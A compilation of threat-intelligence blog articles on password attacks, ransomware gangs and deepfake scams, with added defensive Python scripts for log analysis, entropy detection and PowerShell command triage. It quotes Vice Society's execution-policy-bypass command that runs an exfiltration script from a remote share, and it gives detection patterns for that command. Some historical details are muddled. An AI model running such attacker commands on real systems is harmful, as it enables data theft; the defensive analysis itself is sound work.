Categories
Cyber Threat Intelligence

How Important Is a Secure Password?

Financial fraud and identity theft often begin with unauthorized account access that weak passwords hand to hackers. ‘Password1234’ might have worked 10 years ago, but today it will never pass if you want to protect your banking information, personal data, and identity. Brute-force attacks, one of the most popular forms of cyberattack, can be defeated with secure login credentials and a strong cybersecurity mindset.

Brute-Force Attacks
Trial and error is a hacker’s bread and butter when it comes to brute-force attacks. Threat actors use computers to try commonly used passcodes and wide ranges of combinations against a victim’s account until they gain access, compromising passwords, encryption keys, and login credentials. Hackers have refined this practice over the years, and weak passwords keep it easy.

Credential stuffing, a type of brute-force attack, focuses specifically on harvesting weak passwords and trying them elsewhere, betting that victims follow bad practices and reuse the same login credentials across multiple sites. Dictionary attacks work from a list, or dictionary, of words that threat actors enter one after another in hopes of success. Hybrid and reverse brute-force attacks are similar: they filter through commonly used usernames and work backward, combining password guessing with popular sayings or numbers.

Rainbow table attacks take it a step further and delve into hashes to crack passcodes. Hackers obtain an application’s password hashes and then use a precomputed table, nicknamed a rainbow table, to map the hashes back to passphrases before submitting them. Password spraying is another common method in which hackers use the same password but change the username, working through an acquired list of usernames.
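As an added example that is not part of the original article, the following Python script applies the distinction drawn above (one account hammered with many guesses versus many accounts tried once each) to a constructed set of sshd-style log lines; the thresholds, the log format and all addresses are assumptions.

```python
import re
from collections import defaultdict

# sshd-style failure line; "invalid user" appears when the account does not exist.
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)

MIN_FAILURES = 10          # assumption: fewer failures than this from one source is noise
PER_ACCOUNT_THRESHOLD = 5  # assumption: this many tries per account means guessing one account


def _fail_line(user, ip, invalid=False):
    """Build one constructed sshd log line (timestamp and host are fixed dummies)."""
    who = f"invalid user {user}" if invalid else user
    return f"Apr 10 09:00:00 bastion sshd[4242]: Failed password for {who} from {ip} port 51000 ssh2"


# Constructed sample log using RFC 5737 test addresses; not taken from any real incident.
SAMPLE_LOG = (
    [_fail_line("admin", "203.0.113.7")] * 20                                           # one account, hammered
    + [_fail_line(f"user{i:02d}", "198.51.100.23", invalid=i % 3 == 0) for i in range(15)]  # many accounts, once each
    + [_fail_line("bob", "192.0.2.9")] * 3                                              # a user mistyping a password
    + ["Apr 10 09:00:00 bastion sshd[4242]: Accepted publickey for alice from 192.0.2.10 port 51001 ssh2"]
)


def count_failures(lines):
    """Return {source_ip: {username: failure_count}} from sshd-style log lines."""
    failures = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            failures[m["ip"]][m["user"]] += 1
    return failures


def classify(failures, min_failures=MIN_FAILURES, per_account=PER_ACCOUNT_THRESHOLD):
    """Label each noisy source: few accounts with many tries each = brute force;
    many accounts with one or two tries each = spraying or credential stuffing.
    Auth logs do not record the guessed password, so those two cannot be told apart here."""
    verdicts = {}
    for ip, by_user in failures.items():
        total = sum(by_user.values())
        if total < min_failures:
            continue
        tries_per_account = total / len(by_user)
        verdicts[ip] = "brute-force" if tries_per_account >= per_account else "spray-or-stuffing"
    return verdicts


def analyze(lines):
    """Parse and classify in one step; returns {source_ip: verdict} for noisy sources only."""
    return classify(count_failures(lines))


if __name__ == "__main__":
    for ip, verdict in analyze(SAMPLE_LOG).items():
        print(f"{ip:16} {verdict}")
```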

Credential Harvesting and Phishing
Otherwise known as password harvesting, credential harvesting is notable as the gateway to online fraud. Threat actors achieve it by several methods, such as phishing, fake websites, malware, and other forms of social engineering. Smishing, or SMS phishing, is a common tactic that has grown more popular recently, as more people are noticing text messages with malicious links in their inboxes. Other forms of phishing are conducted through email, the original form, and vishing, which takes place over the phone. In vishing attacks, hackers call victims while impersonating organizations such as banks or college administration offices and try to get them to visit malicious links or hand over sensitive information.

Recent Attacks
Cisco has been warning users this month that software such as its VPNs and SSH services has been found compromised in a surge of brute-force attacks, and to follow its advisories to see the affected systems. In Ukraine, over one hundred million accounts were hijacked in a series of brute-force attacks. Recently, three men were arrested after it was revealed that they had accessed victims’ Instagram and email accounts thanks to easy-to-guess passwords.

WordPress, a web content management system, is currently dealing with a string of attacks that inject scripts coercing victims’ browsers into brute-forcing passwords for other platforms. The scripts’ instructions, delivered as a JSON file, contain everything needed for an attack, which executes silently while the victim is working on their computer.

23andMe recently discovered that it had been the victim of a credential harvesting attack beginning in early 2023. The threat actors specifically targeted customers of Ashkenazi Jewish and Chinese heritage, compromising 350,000 customers’ sensitive data and exposing them to discrimination and harassment as the conflict between Palestine and Israel grows.

Phishing attacks, meanwhile, have continued to rise as the year progresses, with smishing and vishing gaining popularity. LastPass, a password management application, suffered a phishing attack by unknown threat actors this past week using the CryptoChameleon phishing kit. The kit lets actors create fake single sign-on (SSO) pages to serve to victims, enabling them to capture the victims’ credentials and compromise their information.

Password Recommendations
Long and complex is the standard when creating a password: 8-10 characters at the minimum, with symbols and numbers included. Most recommend moving up to at least twelve characters, as the longer the password is, the harder it is for hackers to crack. Your credentials should never contain publicly available information that could be easily guessed, such as your kids’ names, dates of birth, or your wedding date. Instead, use tools such as Google’s password generator or random combinations on your keyboard to produce a complex password. Never use the same password for more than one account, because, as mentioned above, this is the widespread practice hackers look for when performing credential stuffing attacks.

Multi-Factor Authentication (MFA) is another great tool that most sites require today. It may be annoying, but it can save you from thousands of dollars in consequences from attacks. By having a second password or PIN sent to a phone number or email address on a different device than the one you are logging in from, you give hackers a much harder time infiltrating your account. Some MFA implementations use Face ID or a fingerprint to secure your credentials, improving your security score and helping you ensure your systems are protected. Changing your passwords every 60-90 days at the maximum is another recommended technique for account security. Some authentication applications give you the option to set dates for changing your passwords, and others require it. Recurring changes can seem overwhelming, since you have to come up with new passwords every couple of months, but it is important not to reuse the same characters and duplicate them across the changes, or the rotation won’t be as effective.

Ransomware Attacks in the U.S.

Since the start of the new year, companies across the country have witnessed ransomware attacks, with the notorious threat actors Medusa, LockBit, and ALPHV/BlackCat standing out above the others. There have been at least 50 known attacks during the past three and a half months, approximately 25% fewer than the United States saw over the same period the year prior. Although the statistics appear to be moving in our favor, ransomware remains a very prominent threat to businesses and corporations everywhere.

Recent Attacks
From government infrastructure to energy services and transportation, cities from New York to California have had to halt operations due to ransomware attacks. Change Healthcare, a major healthcare technology provider in the United States, suffered two attacks just weeks apart, first from threat actor ALPHV/BlackCat and then from the ransomware gang RansomHub. The sensitive data exfiltrated by the groups included medical records and financial information belonging to US military personnel and patients.

LockBit, the highest-performing ransomware gang so far in 2024, has carried out over 30 attacks against various U.S. sectors since the beginning of the year, with a focus on the education and retail industries. After international law enforcement made arrests in February, some of the eCrime group’s infrastructure was seized. Unfortunately, the threat actor group treated this as a mere setback and was found relaunching its operation less than a week later, taking the lead for the most ransomware attacks by a single group against the country thus far.

During March, the East Coast saw what seemed to be a string of attacks against government facilities within days of each other. Birmingham, Alabama discovered a disruption of its computer network on March 6, shutting down services such as the 311 call center. Huntsville, Alabama was next, on the 10th, and was forced to shut down services across the city due to an attack. No threat actor has stepped up to claim either attack against the Alabama cities, but both are under investigation.

Pensacola, Florida was hit only eight days later, with Henry County, Illinois following four days after that. The Medusa ransomware gang took credit for the Illinois attack, giving the victims eight days to pay a $500,000 ransom. Tarrant County Appraisal District in Texas confirmed it was the victim of an attack by Medusa on the 21st and was told to pay $700,000 in ransom. Jackson County, Missouri was forced to declare a state of emergency after its services were disrupted on the 28th by an unknown threat actor infiltrating its IT systems.

Who is LockBit?
From financial services to manufacturing and healthcare, LockBit ransomware is most notable for the wide array of tactics, techniques, and procedures (TTPs) that allow the group to extort critical infrastructure globally. Because the eCrime group constantly modifies the TTPs it uses to deploy and execute ransomware, unsuspecting victims have a hard time keeping their security defenses up to date. Known for attacks against some of the world’s largest multinational financial institutions and leading technology firms, LockBit has stayed at the top of CISA’s advisory list as the most deployed ransomware-as-a-service over the past two years.

Who is ALPHV/BlackCat?
Commonly victimizing the healthcare sector, the ALPHV/BlackCat ransomware group encrypts both Windows and Linux devices and relies on advanced social engineering techniques. Most commonly posing as IT staff for the victim’s company, the threat actors obtain credentials from employees, which are then used to access the network and deploy remote access software to exfiltrate data. ALPHV/BlackCat evades detection by downloading applications such as Metasploit onto the domain controller and afterwards deleting their traces from the logs on the Exchange server.

Who is Medusa?
First appearing in the cyber realm in June 2021 as a ransomware-as-a-service threat actor group, Medusa has grown substantially over the years, extorting companies with its double extortion method. Beyond encrypting the infiltrated systems, the group threatens to release the stolen data if the victims do not pay the ransom, extorting them twice by compromising sensitive data. With financial gain as the eCrime group’s primary motive, its targets range from corporate victims to technology companies with easily exploitable vulnerabilities.

What To Expect Moving Forward
We can expect ransomware trends to pick up as the year progresses, tracking just below the statistics from 2023. As the more sophisticated threat actors continue to revise their attack methods and gain confidence, we will undoubtedly see new eCrime groups appear and cause chaos in new and unique ways. Thanks to CISA, advisories and rewards for aiding in the takedown of actors such as those listed above are publicly available and recommended reading for all.

Mitigation Techniques
Implementing secure remote access tools and application controls (allowlisting) should help prevent the installation of anything your organization does not want or need. Antivirus tools should never be trusted completely on their own; like anything, they suffer service disruptions, so using a combination of applications stacks the odds more in your favor. Endpoint detection and response (EDR) applications are extremely useful for detecting malicious or unwanted traffic. For this type of monitoring and more, explore the tools we offer at DefendEdge under “Our Services”.

Detecting ransomware can be tricky, but by ensuring that your organization is up to date on security training and aware of its security posture, the risk can be mitigated. If you or someone you know has been the victim of a ransomware attack, remember not to pay the ransom: paying encourages the threat actors to continue their attacks, and financial gain is almost always their main motive.

The Danger of Deepfake Scams

The rise of artificial intelligence (AI) has enhanced our lives in many ways. In the realm of cybersecurity, AI has bolstered defenses against threats: machine learning algorithms, enhanced anomaly detection, and automated response mechanisms allow threats to be detected and neutralized rapidly. However, AI is also being used maliciously by threat actors. A popular use case among cybercriminals is deepfake technology, which uses artificial intelligence and machine learning to create realistic and often deceptive videos and audio recordings. Threat actors often use deepfake videos to impersonate high-profile individuals like executives or celebrities, deceiving viewers into believing they are communicating with a legitimate source. Deepfakes can support many scams, such as persuading individuals to transfer funds or disclose sensitive information through deceptive and convincing simulations.

Recently, an advertisement featuring Ripple CEO Brad Garlinghouse has been circulating on X, formerly known as Twitter, and on YouTube. In the ad, the CEO tells viewers to send their XRP to a specific address to have it doubled as thanks for supporting the company. XRP is a cryptocurrency and the native token of Ripple. Of course, Garlinghouse has made no statements about XRP airdrops, and he has confirmed that the ad is a scam. The surprising element is that YouTube’s algorithm, designed to detect scams, did not flag this one.

Another recent deepfake scam impersonated Elon Musk. In the video, the Tesla CEO announces the opening of an investment platform called ‘Quantum AI.’ The video was shared on Facebook, and the attached link leads to a website called ‘financial advisors.’ The deepfake appears to have been built from a video of an interview with Musk on CNBC’s YouTube channel. There is no credible news of Musk launching any ‘Quantum AI’ platform.

It can be challenging to detect deepfakes due to their realistic appearance. Mitigation of these AI scams relies on technological solutions, awareness, and vigilance. Unnatural facial expressions or inconsistencies in audio can be a clear giveaway of deepfakes. If you spot suspicious advertisement videos, check that they come from verified profiles. Where applicable, implement strong authentication measures. Regarding cryptocurrency and phishing, consistently follow best practices such as never providing personal information in response to an unsolicited request, contacting the financial institution yourself, and never giving your password over the phone. If you believe you have fallen victim to a phishing attempt and money has changed hands, your first steps toward recovering lost assets are to deactivate or flag the payment method used and to contact local law enforcement.

Clop Ransomware Gang: Profiling a Notorious Cybercriminal Organization

In recent years, the Clop ransomware gang has emerged as one of the most prolific and notorious cybercriminal organizations. Employing sophisticated techniques and constantly evolving their strategies, the group has successfully targeted high-profile organizations worldwide. This article aims to provide an informative profile of the Clop ransomware gang, detailing its history, operations, and recent activities.

History of Clop
Clop originated as a variant of the CryptoMix ransomware family and gained prominence in February 2019, when the threat group known as TA505 used it in a large-scale spear-phishing email campaign. Operating under a ransomware-as-a-service (RaaS) model, Clop was used by a Russian-speaking group and disguised its malicious intent with verified, digitally signed binaries, which allowed the ransomware to evade security detection effectively.

In 2020, the financially motivated hacking group FIN11 began deploying Clop ransomware, leveraging zero-day vulnerabilities in the Kiteworks file transfer appliance. These attacks used a web shell called “DEWMODE” to exfiltrate stolen information. Clop’s operators also began running double extortion schemes, threatening to publicize and auction off stolen data if their demands were not met.

Clop’s Operations
The Clop ransomware gang exhibits a range of sophisticated techniques in its operations. Unlike other ransomware variants, Clop targets entire networks rather than individual computers, gaining access to the Active Directory (AD) server to persistently infect endpoints. Previous attacks by the group involved large-scale phishing campaigns, utilizing spam emails and malicious attachments to deliver the Clop malware. These attacks often involved various tools, such as SDBOT, FlawedAmmyy, and Cobalt Strike, which facilitated reconnaissance, lateral movement, and exfiltration of data before the deployment of the ransomware.

The group utilizes multiple tactics to coerce victims, including negotiation emails and threats of publicizing stolen information on their dedicated leak site, “Cl0p^_-Leaks.” Clop has even employed quadruple extortion techniques, targeting top executives and customers to exert additional pressure on companies to pay the ransom. By constantly evolving its tactics, Clop has set new trends in the world of cybercrime.

Recent Activities
While the arrests of six suspected Clop members in Ukraine in June 2021 dealt a significant blow to the group, its criminal activities continued throughout 2021 and 2022. However, recent data suggests a slowdown in ransomware deployments, indicating a shift towards data theft and extortion. Law enforcement and private partners managed to seize parts of Clop’s infrastructure and take down money laundering channels used for cryptocurrency payments.

In May 2023, the Clop gang exploited critical zero-day vulnerabilities in the MOVEit Transfer and MOVEit Cloud file transfer software, targeting numerous private and public organizations. These attacks focused on stealing sensitive data and extorting companies rather than encrypting systems. The group used a combination of tactics, including data leak threats and demands for negotiations, to pressure victims into complying with their demands.

The Clop ransomware gang has established itself as a formidable threat in the cybersecurity landscape. With a history of high-profile attacks and constantly evolving tactics, the group continues to pose a significant risk to organizations worldwide. Enterprises must remain vigilant and adopt proactive cybersecurity measures to mitigate the threats posed by ransomware groups like Clop. Collaborative efforts between law enforcement, private partners, and cybersecurity professionals are crucial in dismantling such criminal organizations and safeguarding sensitive data from exploitation.

The Play Ransomware Gang: Profile of a Persistent Threat

In recent years, the world has witnessed an alarming rise in cyberattacks, with ransomware being one of the most pervasive and damaging forms of malicious activity. The Play ransomware gang has emerged as a highly disruptive and notorious group among the many ransomware gangs. This article aims to provide an informative and professional profile of the Play ransomware gang, shedding light on their operations, tactics, and notable attacks.

The City of Oakland Attack

The Play ransomware gang made headlines with their cyberattack on the City of Oakland, California. Beginning in mid-February 2023, the attack targeted the city’s IT systems, causing significant disruptions. While emergency services remained operational, various other departments were severely impacted, including business taxation and parking citation services. The gang claimed responsibility for the attack and demanded a ransom, threatening to expose sensitive data stolen from the city.

Attack Methodologies

Play ransomware employs several sophisticated techniques to infiltrate and compromise targeted organizations. The gang exploits known vulnerabilities, such as exposed RDP servers and FortiOS vulnerabilities (CVE-2018-13379 and CVE-2020-12812), to gain initial access. Once inside the network, they employ living-off-the-land binaries (“lolbins”) and distribute executables via Group Policy Objects. Notably, the gang also engages in double extortion, exfiltrating sensitive data and threatening to release it if their ransom demands are not met.

Unique Technique: Intermittent Encryption

A distinctive characteristic of the Play ransomware gang is its use of intermittent encryption. This novel technique encrypts files in smaller, intermittent chunks, evading detection by security systems that rely on static analysis. By encrypting only portions of a file, often distinguished by null characters, Play ransomware can remain undetected for longer, exacerbating the damage caused to targeted organizations.
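The following Python code is an added example, not part of the article or of any Play tooling: it scores a file chunk by chunk with Shannon entropy and flags the alternating high/low pattern that intermittent encryption leaves behind, which a whole-file entropy average would hide. The chunk size, thresholds and sample file contents are assumptions.

```python
import math
import random
from collections import Counter

CHUNK = 4096        # analysis window in bytes (assumption; tune to the encryptor's stride)
HIGH_ENTROPY = 7.5  # bits/byte: uniform random data scores ~8, so this marks "looks encrypted"


def shannon_entropy(data):
    """Bits of entropy per byte of `data` (0.0 for empty, up to 8.0 for uniform random)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def chunk_profile(data, chunk=CHUNK):
    """One boolean per chunk: True where the chunk's entropy is in the 'looks encrypted' range."""
    return [shannon_entropy(data[i:i + chunk]) >= HIGH_ENTROPY for i in range(0, len(data), chunk)]


def classify(data, chunk=CHUNK):
    """Label a file body by the *pattern* of high-entropy chunks, not just their average."""
    profile = chunk_profile(data, chunk)
    if not profile:
        return "empty"
    if all(profile):
        return "high-entropy"      # fully encrypted, but also any compressed or packed format
    if not any(profile):
        return "plaintext"
    # Fraction of chunk boundaries where the entropy flips. Intermittent encryption
    # alternates encrypted and untouched stretches, so this approaches 1.0; a document
    # with one embedded image flips only twice, so it stays low.
    flips = sum(a != b for a, b in zip(profile, profile[1:]))
    ratio = flips / (len(profile) - 1)
    return "intermittently-encrypted" if ratio >= 0.5 else "mixed-content"


def _pseudo_ciphertext(rng, n):
    """Deterministic random bytes standing in for ciphertext, so the demo is reproducible."""
    return rng.getrandbits(8 * n).to_bytes(n, "big")


def constructed_samples():
    """Constructed inputs; not real files and not real ransomware output."""
    rng = random.Random(2024)
    text = (b"Quarterly report: revenue, costs, headcount.\n" * 200)[:CHUNK]
    return {
        "plain": text * 8,
        "cipher": _pseudo_ciphertext(rng, CHUNK * 8),
        # every other 4 KiB chunk encrypted, the rest left untouched
        "partial": b"".join(_pseudo_ciphertext(rng, CHUNK) if i % 2 == 0 else text for i in range(8)),
        # ordinary document with a single embedded high-entropy blob (e.g. an image)
        "embedded": text * 3 + _pseudo_ciphertext(rng, CHUNK) + text * 4,
    }


def classify_samples():
    """Run classify() over every constructed sample; returns {name: verdict}."""
    return {name: classify(body) for name, body in constructed_samples().items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:9} -> {verdict}")
```

Whole-file entropy for the "partial" sample lands between the plaintext and ciphertext values and looks like nothing in particular; the per-chunk flip ratio is what separates it from a document with one embedded image.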

Notable Attacks

Beyond the City of Oakland, the Play ransomware gang has targeted various organizations worldwide. One significant incident occurred in Switzerland, where they hacked Xplain, an IT firm that supported numerous federal and cantonal government departments. They also targeted the major Spanish bank Globalcaja, compromising client and employee documents. Additionally, the gang claimed to have stolen 600GB of data from communications firm Poly (Polycom).

Play Ransomware Tools

The Play ransomware gang has developed custom tools to enhance their attacks’ effectiveness. Grixba, a network-scanning and information-stealing tool, enables them to enumerate users and computers within a compromised network. The VSS Copying Tool allows the gang to interact with the Volume Shadow Copy Service, even copying files in use by applications. These tools provide them with critical information and increase the efficiency of their malicious activities.

Security Recommendations

Organizations should implement robust security measures to combat the evolving threat posed by ransomware groups like Play. These include multifactor authentication (MFA), least privilege principles, network segmentation, attack surface management (ASM), secure domain controllers (DC), regular patching and updates, and maintaining encrypted offline backups of critical data. Additionally, employing threat intelligence platforms and monitoring the dark web for emerging threats can enhance an organization’s security posture.

The Play ransomware gang has proven to be a persistent and highly disruptive threat to organizations worldwide. Their sophisticated attack methods, including intermittent encryption and double extortion, showcase their determination to exploit vulnerabilities for financial gain. Organizations must remain vigilant, implementing robust security measures and proactive threat mitigation strategies to protect themselves against the increasing menace of ransomware attacks.

ALPHV Ransomware: A Closer Look into the Russian Ransomware Group

In recent years, the Russian-based ALPHV ransomware group, also known as BlackCat, Noberus, Gold Blazer, and Alpha Spider, has emerged as a formidable cyber threat, targeting organizations worldwide and operating under a ransomware-as-a-service (RaaS) business model. With its advanced tactics and persistent attacks, ALPHV has become a significant player in the ransomware landscape, targeting over 400 victims and demanding ransoms ranging from $400,000 to $3 million in cryptocurrency.

ALPHV ransomware has continued to grow since 2021 for a variety of reasons; a large contributor to this growth is its marketing strategy. ALPHV lets affiliates use its ransomware and keep 80-90% of the ransom, with the remainder going to ALPHV, fueling the growth of its notoriety.

The ransomware itself is written in the Rust programming language and is believed to be the first ransomware developed in Rust. Rust lets ALPHV compile it easily for different operating system architectures, and its extensive array of native options offers a high level of customization, enabling attackers to pivot and personalize their attacks effectively.

Utilizing the RaaS model, many threat actors, including ALPHV, will leverage the double-extortion technique, which implements two methods of attack. The double-extortion kill chain typically follows:

Initial Breach: During this phase, the attacker successfully infiltrates the target’s systems using methods such as an exploited vulnerability, a phishing attempt, brute force, or stolen credentials used over remote desktop protocol.

Network Reconnaissance and Lateral Movement: The threat actor assesses the network’s security measures to identify potential detection points. Having evaded detection, the attacker moves through different parts of the network, gaining access to various resources.

Data Exfiltration (Extortion Tactic #1): In the first stage of double extortion, the attacker extracts data from the compromised device without immediately demanding a ransom. The user remains unaware of their data being held hostage at this point.

Ransomware Deployment (Extortion Tactic #2): At this crucial stage of all ransomware attacks, the deployed ransomware encrypts the victim’s data, rendering it inaccessible. The user’s system is locked, and a ransom demand is prepared.

DDoS Attack on Site or Network: In this phase, the attacker notifies the user of the ongoing attack on their system. The victim is provided with instructions on how to pay the ransom to regain access to their encrypted data.

Publish Data: If the ransom is not paid, the attacker will post sensitive data, credentials, and other valued information on a name-and-shame blog utilized by the attacker.

Organizations wanting to mitigate the risks associated with ALPHV and similar ransomware groups should adopt a proactive and multi-layered approach. This includes regular employee training on identifying phishing attempts, implementing robust network security measures, regularly patching and updating software, and maintaining secure backups of critical data.

Vice Society: One of the Most Impactful Ransomware Gangs of 2022

Vice Society (also known as Vice Spider, DEV-0832, and Vanilla Tempest) is identified as a Russian-based group specializing in intrusion, exfiltration, and extortion. Operating since the summer of 2021, Vice Society sets itself apart from other ransomware groups by deviating from the typical ransomware-as-a-service (RaaS) model. Instead of developing their own custom ransomware payload, they rely on modified versions of existing ransomware families available for sale on dark web marketplaces. Specifically, Vice Society has been observed using forks of ransomware strains such as HelloKitty (also known as FiveHands) and Zeppelin in their attack chain. This approach differentiates them from groups like LockBit, which follow the RaaS model. While many ransomware groups have transitioned to using randomly generated file extensions, DEV-0832 has incorporated branding in their Vice Society variant, using file extensions such as .v-s0ciety or .v-society. In late September 2022, DEV-0832 introduced another variant called RedAlert, which uses the .locked file extension as part of its ransomware payload.  

This financially motivated group occasionally avoids deploying ransomware and opts for extortion using stolen data. In 2022, Vice Society was recognized as one of the most impactful ransomware gangs. The group focused heavily on educational institutions, surpassing other ransomware families such as LockBit, BlackCat, BianLian, and Hive. Cybersecurity researchers found that Vice Society also targeted prominent industry sectors, including healthcare, government, manufacturing, retail, and legal services. Although its attacks are technically unremarkable, Vice Society has targeted victims across continents, spanning North America, South America, and Europe.

DEV-0832 uses various methods to gain access to victims’ systems. These threat actors initially breach networks using well-known techniques such as phishing, compromised credentials, known security vulnerabilities, or even buying initial access from criminal actors referred to as “initial access” brokers. Once inside a network, Vice Society employs automated scripts and leverages the organization’s own network management tools to conduct reconnaissance and extract data. The group then deploys the prepackaged ransomware to carry out its malicious activities, and has been observed using tools such as PowerShell Empire, SystemBC, and Cobalt Strike for lateral movement. Based on incident response efforts in 2021, Vice Society typically remains in a victim’s environment for around six days. Initial ransom demands can exceed $1 million, but negotiations often lead to a reduction of about 60%, settling at around $460,000. Vice Society takes extensive steps to prevent organizations from recovering without paying the ransom. In some observed cases, DEV-0832 accessed two domain administrator accounts and reset passwords for over 150,000 users. This effectively locks out legitimate users and hampers remediation, including attempts to prevent the deployment of ransomware or conduct post-compromise incident response.

In early 2023 it was discovered that the Vice Society ransomware gang had attacked the Los Angeles Unified School District (LAUSD), the second-largest school district in the United States. As a result of this attack, files containing the personal information of contractors, including Social Security Numbers (SSNs), were stolen. LAUSD discovered that the threat actors had access to its network for over two months, from July 31, 2022, to September 3, 2022. The stolen data included payroll records and labor-related documents containing SSNs, names, and home addresses of contractor and subcontractor employees. LAUSD confirmed that Vice Society had published the stolen data on its leak site. Despite the ransom demands, LAUSD refused to pay, prioritizing its resources for students’ education. The FBI, CISA, and MS-ISAC issued a joint advisory highlighting Vice Society’s disproportionate targeting of the U.S. education sector, which includes LAUSD. Vice Society has also claimed attacks on other educational institutions globally, including Cincinnati State Technical and Community College and the University of Duisburg-Essen. LAUSD serves over 640,000 kindergarten through 12th-grade students across Los Angeles and surrounding areas.

Most recently, cybersecurity researchers found that the Vice Society ransomware gang used a custom-built Microsoft PowerShell (PS) script to exfiltrate data from a victim network. Using PowerShell, a built-in tool, for exfiltration helps threat actors evade security software and detection mechanisms. The script, named w1.ps1, was recovered from the Windows Event Log (WEL) and was executed with the PowerShell command “powershell.exe -ExecutionPolicy Bypass -file \\[redacted_ip]\s$\w1.ps1”. The script automatically selects and copies data from the network without requiring any arguments: it identifies mounted drives on the system, recursively searches their root directories, and exfiltrates data via HTTP. It applies exclusion criteria to filter out system files, backups, web-browser-related folders, and certain security solutions. The script showcases a high level of coding expertise and highlights the persistent threat of double extortion in ransomware, emphasizing the importance of strong security measures and vigilance against evolving threats. While the script is efficient in terms of resource consumption, its criteria mean it will only exfiltrate files over 10 KB with specific file extensions and within designated directories.

To mitigate the impact of Vice Society, consider implementing the following measures: 

  • Conduct device discovery to increase network visibility. 
  • Utilize vulnerability management tools for updates. 
  • Employ firewalls and intrusion prevention devices. 
  • Enable cloud-delivered protection in your antivirus solution. 
  • Activate tamper protection features. 
  • Run endpoint detection and response in block mode. 
  • Enable automated investigation and remediation. 
  • Implement strong credential hygiene practices. 
  • Apply attack surface reduction rules to prevent common infection vectors. 
  • Enable PowerShell Module and Script Block Logging in PowerShell.  

Additionally, monitoring for the PowerShell command line mentioned earlier (an execution-policy bypass combined with a script loaded from a remote share) is recommended. Together, these measures will strengthen your defenses and reduce the impact of the threat.
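As an added example (not code from the original advisory or from the researchers who analyzed the script), the following Python triage routine applies the recommendation above to PowerShell command lines as they would appear in Windows Event ID 4688 or Sysmon Event ID 1 process-creation records. The sample command lines are constructed for illustration; only the w1.ps1 name and the execution-policy-bypass-plus-remote-share pattern come from the reported command.

```python
import re

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_CMDLINES = [
    r'powershell.exe -ExecutionPolicy Bypass -file \\10.0.0.5\s$\w1.ps1',
    r'powershell.exe -ep bypass -f \\fileserver\c$\tools\collect.ps1',
    r'powershell.exe -NoProfile -File C:\scripts\backup.ps1',
    r'cmd.exe /c dir',
]

# -ExecutionPolicy Bypass and its common short forms (-ep, -exec).
BYPASS_RE = re.compile(r'-(?:ExecutionPolicy|ep|exec)\s+bypass', re.I)
# -file / -f pointing at a UNC path: \\host\share\...\name.ps1 (share captured).
UNC_SCRIPT_RE = re.compile(
    r'-(?:file|f)\s+"?(\\\\[^\s"\\]+\\([^\s"\\]+)\\[^\s"]*\.ps1)', re.I)


def analyze(cmdline):
    """Return the reasons a command line is suspicious (empty list if none)."""
    reasons = []
    if 'powershell' not in cmdline.lower():
        return reasons
    if BYPASS_RE.search(cmdline):
        reasons.append('execution policy bypass')
    match = UNC_SCRIPT_RE.search(cmdline)
    if match:
        path, share = match.group(1), match.group(2)
        reasons.append('script loaded from UNC path')
        if share.endswith('$'):
            # Shares ending in '$' are hidden; admin shares (C$, ADMIN$) and
            # the reported 's$' share fall in this class.
            reasons.append('hidden/admin share')
        if path.lower().endswith('\\w1.ps1'):
            reasons.append('known Vice Society script name w1.ps1')
    return reasons


def triage(cmdlines):
    """Map each suspicious command line to its reasons; benign lines are omitted."""
    return {c: analyze(c) for c in cmdlines if analyze(c)}


if __name__ == '__main__':
    for cmd, why in triage(SAMPLE_CMDLINES).items():
        print(cmd, '->', ', '.join(why))
```

Script Block Logging (Event ID 4104) additionally records the body of w1.ps1 when it runs, so the same triage can be extended to the script text once Module and Script Block Logging are enabled.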


BlackByte Ransomware Returns: Introducing the New Technology (NT) Variant

Emerging around July 2021, BlackByte is a fully featured Ransomware-as-a-Service (RaaS) group that infiltrates organizations and demands hefty ransoms. They employ a strategy known as double extortion, stealing files from the targeted organization and publicly leaking them if the ransom goes unpaid. BlackByte is known for continuously updating and distributing its malware of the same name in various versions. The initial implementation of BlackByte was in C#, followed by a Golang version that included a privilege escalation technique based on Bring Your Own Vulnerable Driver (BYOVD). The latest iteration, called BlackByte NT, is written in C++ and incorporates diverse methods to obstruct both static and dynamic analysis of the malware. The primary objective of this new version is to obfuscate the malware’s behavior when under scrutiny.

The evolution of BlackByte showcases their relentless pursuit of refining their malicious capabilities. The latest version, BlackByte NT, employs various tactics, including resolving Windows API imports dynamically by hash, anti-debug checks, and evasion techniques such as issuing syscalls directly instead of calling the standard Windows API libraries. Furthermore, the malware thoroughly checks its execution arguments and establishes persistence by registering a new service if the appropriate conditions are met. BlackByte NT employs modern cryptographic algorithms: Curve25519 elliptic curve cryptography (ECC) for the asymmetric part of the scheme and the ChaCha20 stream cipher for symmetric file encryption. Like its previous version, the latest variant of the BlackByte malware continues to utilize vulnerable drivers as part of its evasion techniques. Specifically, the malware drops two files, “A3V86HEL” and “A3V86HEL_1”, in the directory C:\SystemData. The file “A3V86HEL” corresponds to RTCore64.sys, a kernel-mode driver associated with Micro-Star MSI Afterburner, a graphics card utility. The other file, “A3V86HEL_1”, is DBUtil_2_3.Sys, a driver related to the Dell Client firmware update utility. These drivers can be exploited to escalate privileges within the targeted system and disable security protection products. While the use of the RTCore64.sys driver was previously reported in the analysis of the second version of BlackByte, the inclusion of the Dell driver appears to be a distinguishing characteristic of the new variant.

Indicators of Compromise (IOCs):

SHA256 – 02a0a39dbe0dcb5600f4179aeab457bb86965699e45d1d154082b02139dc701d

SHA1 – c0950ebfa3a63c705ca813cfd28364aa1d90bb09

MD5 – bf1f2f3759448a05d3dd92a4f7f042f6

Some recommended mitigations for the new BlackByte variant include keeping software updated, educating users about risks and social engineering techniques, maintaining regular backups, restricting privileges and access, implementing network segmentation, utilizing behavioral analysis and threat detection tools, developing an incident response plan, conducting security awareness training, and performing regular security audits. These measures help protect against known vulnerabilities, detect and block malicious activities, minimize the impact of ransomware infections, and ensure effective incident response and recovery.
